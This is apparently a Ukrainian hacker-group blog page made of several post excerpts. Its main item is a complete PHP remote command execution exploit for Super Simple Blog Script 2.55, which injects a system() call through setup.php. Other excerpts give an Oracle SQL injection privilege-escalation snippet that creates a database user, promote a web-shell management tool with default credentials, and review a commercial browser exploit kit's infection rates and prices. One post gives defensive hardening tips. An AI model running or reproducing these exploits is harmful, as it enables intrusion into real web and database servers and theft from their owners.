Вразливість в даному продукті виникає через недостатню фільтрацію даних. Система після встановлення не попереджає користувача про необхідність видалення файлу setup.php, внаслідок неавторизованого доступу до цього файлу атакуючий має можливість виконати будь-яку команду в системі з правами веб-сервера. Нижче приведений код експлойту.

<?php

/**
 * @author Paketik [UASC.org.ua]
 * @copyright 2010
 * @Super Simple Blog Script Remote Command Execution Exploit
 * @Version 2.55
 * @Vendor www.supersimple.org
 * @Risk Very high
 * @usage exp.php domen path command
 * @example php exp.php http://localhost/SuperSimpleBlogScript ls -la
 */

error_reporting(false);

if(count($argv) < 3) { banner(); } else
{
 echo count($argv) ;
 $command = "";
 for($i=2; $i<count($argv); $i++)
 {
 $command .= $argv[$i] . " ";
 }
 $command = trim($command);
 exploit($argv[1],$command);
 }
function exploit($target,$command)
{
 $rnd = randomtab();
 print "[#] Target: ".$target."\r\n";
 print "[#] Command: ". $command."\r\n";
 print "[#] Generating random table name: ". $rnd."\r\n";
 print "[#] Parsing Full Path ";
 $content = file_get_contents($target."/setup.php");
 $p = getpath($content);
 print $p."\r\n";
 print "[#] Exploiting....\r\n";

 $_data = array("BASEURL" => $p,
 "PAGETITLE"=>"Title",
 "PERPAGE"=>20,
 "BLOGPAGENAME"=>"index",
 "USER0"=>"qaz",
 "PASSWORD0"=>"qaz",
 "IMAGESPERENTRY"=>1,
 "MULTIUSERS"=>"false",
 "COMMENT"=>"true",
 "TABLENAME"=>$rnd,
 "TIMEOFFSET"=>0,
 "RSSDESC"=>"rss'; system('".$command."'); //",
 "url"=>$target,
 "submit"=>"");
 $data = array();
 list($header, $content) = PostRequest($target."/setup.php", $target."setup.php", $_data);
 //print $header;
 if( strpos($header,"success"))
 {
 print "[###] Successful! View result:$target \r\n";
 } else
 {
 print "[---] Exploit Failed   \r\n";
 die();
 }

}

function randomtab()
{
 $a = array("a","b","c","d","e","f","g",1,2,3,4,5,6,7,8,9,0);
 $string = $a[rand(0,16)].$a[rand(0,16)].$a[rand(0,16)].$a[rand(0,16)].$a[rand(0,16)];
 return $string;
}
function PostRequest($url, $referer, $_data) {

 $data = array();
 while(list($n,$v) = each($_data)){
 $data[] = "$n=$v";
 }
 $data = implode('&', $data);

 $url = parse_url($url);
 if ($url['scheme'] != 'http') {
 die('Only HTTP request are supported !');
 }

 $host = $url['host'];
 $path = $url['path'];

 $fp = fsockopen($host, 80);

 fputs($fp, "POST $path HTTP/1.1\r\n");
 fputs($fp, "Host: $host\r\n");
 fputs($fp, "Referer: $referer\r\n");
 fputs($fp, "Content-type: application/x-www-form-urlencoded\r\n");
 fputs($fp, "Content-length: ". strlen($data) ."\r\n");
 fputs($fp, "Connection: close\r\n\r\n");
 fputs($fp, $data);

 $result = '';
 while(!feof($fp)) {

 $result .= fgets($fp, 128);
 }

 fclose($fp);

 $result = explode("\r\n\r\n", $result, 2);

 $header = isset($result[0]) ? $result[0] : '';
 $content = isset($result[1]) ? $result[1] : '';

 return array($header, $content);
}
function getpath($content)
{
 $a =  preg_match('/BASEURL" value="(.+?)"/i',$content,$m);
 return $m[1];
}

function banner()
{
 print "/**\r\n
 * @author Paketik [UASC.org.ua]\r\n
 * @copyright 2010\r\n
 * @Super Simple Blog Script Remote Command Execution Exploit \r\n
 * @Version 2.55 \r\n
 * @Vendor www.supersimple.org \r\n
 * @Risk Very high\r\n
 * @usage exp.php domen path command\r\n
 * @example php exp.php http://localhost/SuperSimpleBlogScript ls -la  \r\n
 */";
 die();
}
?>

Після невдалого rfi\lfi на одному з серверів AOL, шукав я де б знайти чогось відомого, ось и натрапив на редхат, а там швиденько знайшов скулю. blind sql-inj. Як виявилось, там ще у юзера і file_priv=y.

Не буду тягнуть кота за яйця:
Read more…

Не люблю багато писати, тому все швиденько та по порядку: шукав функцію вразливу до sql-injection під свої потреби, наткнувся на таку в пакеті dbms_job який належить sys користувачеві, функція find_date.

...
30 CUR := DBMS_SQL.OPEN_CURSOR;
31 BEGIN
32
33 DBMS_SYS_SQL.PARSE_AS_USER( CUR, 'select sysdate, ' || INTERVAL ||
34 ' from dual', DBMS_SQL.NATIVE );
...

INTERVAL – вразливий параметр. Але тут проблема: функція не оголошена в пакеті, тобто її можна використовувати тільки всередині пакету, під мої потреби це не підходить, хоча, можливо  комусь і буде потрібно. Але щоб довести справу до переможного кінця,  знайшов процедуру в пакеті яка цю функцію використовує, вона там не одна, але так як мені ця функція не підійшла, я взяв першу ліпшу.

...
134 MYDATE: = FIND_DATE (INTERVAL);
135 IF NOT NO_PARSE THEN
136 PARSE_JOB (WHAT);
137 END IF;
138
...

Створюємо функцію, хоча можна використати і курсор, але я віддаю перевагу старій школі.

CREATE OR REPLACE FUNCTION fff return varchar2
authid current_user as
pragma autonomous_transaction;
BEGIN
EXECUTE IMMEDIATE 'create user fff identified by fff';
COMMIT;
RETURN 'sys';
END;
/

Ну і власне сам експлойт (під катом):
Read more...

madShellC0ntr01 v1.2

Писався софт достатньо давно, та і виключно в цілях ознайомлення Якщо чесно, то я вже навіть не пам’ятаю чи реалізував все що хотів, чи ні (хоча скоріше, що ні). Отже, дозвольте представити вам систему для роботи з великою кількістю веб-шеллів типу madshell.

Меню:

Думаю все інтуїтивно зрозуміло (:

В версії 1.2 система автоматично оприділяє такі параметри:

• Safe Mode
• Platform
• Version
• Country

Стандартна пара логін-пароль: admin:pass

Завантажити

Хочу надати вам інформацію про тестування зв’язки експлойтів  Eleonore exploits pack version 1.2. Написана вона автором Exmanoize. В склад зв’язки входять такі експлойти

Середній пробив характерний для звязки:

• usa: 5-15%
• mix: 10-25%

Ціни:

• Власне зв’язка = 700$
• Чищення від АВ = 50$
• Ребілд на інший домен = 50$

Як не дивно, та в системі присутні вразливості, далі про них.

Read more…

Нещодавно мною були виявленні численні вразливості на сайті top.blog.net.ua. В той же день про це була повідомлена адміністрація проекту, але, нажаль відповіді я так і не отримав. Сподіваюсь цей пост спонукає їх виправити вразливості. А тепер блище до справи.

Що треба щоб бути в топі?

UA TOP Bloggers визначає позиції сайту за такими показниками:

• Кількість хостів (унікальні користувачі)
• Кількіст хітів (кількість переглядів)

Розглянемо як система реєструє ці дані. Від нас вимагають встановити код кнопки на сайті. Логічно що через нього і проводиться підрахунок. Поглянемо на код:

Все зрозуміло –  картинка генерується скриптом, якому передаються 2 параметри: in,id. Id це і є номер нашого сайту.

Read more…

Експлойт був знайдений на сайті www.topix21century.com. Начинка експлойта завантажувала та виконувала на комп’ютері жертви бінарний файл, який в свою чергу встановлював зєднання з www.topix21century.com.
Наразі вже є готовий експлойт написаний для Metasploit Framework. Успішно спрацював на вказаних продуктах:
– Microsoft Internet Explorer 7, Windows Vista SP2
– Microsoft Internet Explorer 7, Windows XP SP3
– Microsoft Internet Explorer 6, Windows XP SP3

Подивитись вихідний код експлойту.

Експлойт запропонований Moshe Ben Abu (деобфускований та з видаленою malware начинкою):
У звязку з тим, що ESET NOD32 через код сплойту сповіщає що наш блог містить потенційно небезпечний контент – даємо лінк на код експлойту:

http://uasc.org.ua/files/ie6-7exploit.txt

Відео роботи експлойта:

Internet Explorer 0-day Attack from Panda Security on Vimeo.

В журналі “][акер" #134 2010 р. вийшла моя стаття "GOV сайты под угрозой". Далі оригінал статті на російській мові.

GOV сайты под угрозой

Read more…

Найпопулярніше питаня до нас це “Як зробити, щоб нічого не робити, а сайт був супер-безпечний”, і постійно ми відповідали по різному максимально приховуючи АБСОЛЮТНО-СУПЕР-СЕКРЕТНУ технологію, що була розроблема століння назад. І лише сьогодні цім секретом поділимося ), тож якщо ви хочете створювати безпечний сайт, то ось 5 рекомендацій:

1. При програмуванні використовуйте фреймворки, типу ЗендФреймворка, КодеІгнайтера, Джанго, чи інших подібних. Використання фреймворків захищає вас від банальних помилок. Якщо говорити про Джанго, то в нім по замовчуванні є влаштований захист від майже всіх типів атак – SQL-inj, CSRF, XSS. Ці фреймворки написані великою кількістю розумних людей, тому помилок там дуже мало. Набагато менше, ніж якщо б ви цей функціонал писали самі.
2. Закривайте все по IP.
3. Закривайте все по IP.
4. Закривайте все по IP, якщо в вас є адмінка на сайті, то вхід до неї також закривайте по IP. Це дуже просто і супер надійно. Звичайно трішки “неудобства” добавить вам в зв’язку з необхідністю використуванням VPN коли не з основного місця працюєте, але це того варте. Наприклад, якщо зловмисник навіть дізнається адмінський пароль, то він абсолютно нічого не зможе зробити. Це просто реалізується в усіх веб-серверах, а я юзаю nginx, і в нім в конфігі є такі рядки:

   location /admin/ {
allow 127.0.0.1;
deny all;
...
}


5. І знову – закривайте все по IP, якщо в вас є MySQL, FTP і все інше, то все це закривайте файрволом. На сервак повинен бути доступ з будь якого IP лише до ssh з сертифікатом і великим паролем.

SALO PACK © UASC

by n0153r, Dimi4

• Даний програмний продукт призначений тільки для освітніх цілей. Використання його в будь-якому іншому
• вигляді може бути розцінено як порушення закону!
• Заборонено продаж і використання вихідного коду SALO PACK в комерційних цілях

Read more…